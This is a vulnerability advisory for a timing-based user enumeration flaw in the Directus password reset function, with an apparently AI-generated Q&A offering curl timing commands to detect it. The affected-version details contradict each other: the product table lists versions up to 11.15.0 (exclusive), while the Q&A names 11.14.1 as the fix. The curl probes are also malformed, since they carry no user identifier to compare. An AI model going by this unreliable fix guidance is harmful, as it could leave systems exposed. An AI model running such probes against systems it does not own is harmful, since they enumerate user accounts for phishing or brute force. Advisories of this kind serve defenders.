CVE-2026-26185
Timing-Based User Enumeration in Directus Password Reset Function
Publication date: 2026-02-12
Last updated on: 2026-02-20
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| monospace | directus | to 11.15.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-203 | The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Directus versions before 11.14.1 and involves the password reset functionality. Specifically, it is a timing-based user enumeration vulnerability where the response time differs by about 500 milliseconds depending on whether the reset_url parameter corresponds to an existing user or not. This timing difference allows an attacker to reliably determine if a user exists in the system.
How can this vulnerability impact me? :
The vulnerability allows attackers to enumerate valid users by measuring response times during password reset attempts. This can lead to privacy issues and potentially facilitate further attacks such as targeted phishing or brute force attempts against known user accounts.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by observing the response times of the password reset functionality when providing different reset_url parameters. Specifically, by sending requests with invalid reset_url parameters for both existing and non-existing users, you can measure the response time difference of approximately 500ms, which indicates the presence of the timing-based user enumeration vulnerability.
Commands to detect this might involve using tools like curl or any HTTP client to send password reset requests and measure response times. For example, using curl with time measurement options to compare responses for different users.
- curl -w "%{time_total}\n" -o /dev/null -s "https://your-directus-instance.com/password-reset?reset_url=invalid_for_existing_user"
- curl -w "%{time_total}\n" -o /dev/null -s "https://your-directus-instance.com/password-reset?reset_url=invalid_for_non_existing_user"
By comparing the total time taken for these requests, a consistent difference of about 500ms suggests the vulnerability is present.
What immediate steps should I take to mitigate this vulnerability?
The immediate step to mitigate this vulnerability is to upgrade Directus to version 11.14.1 or later, where this timing-based user enumeration vulnerability in the password reset functionality has been fixed.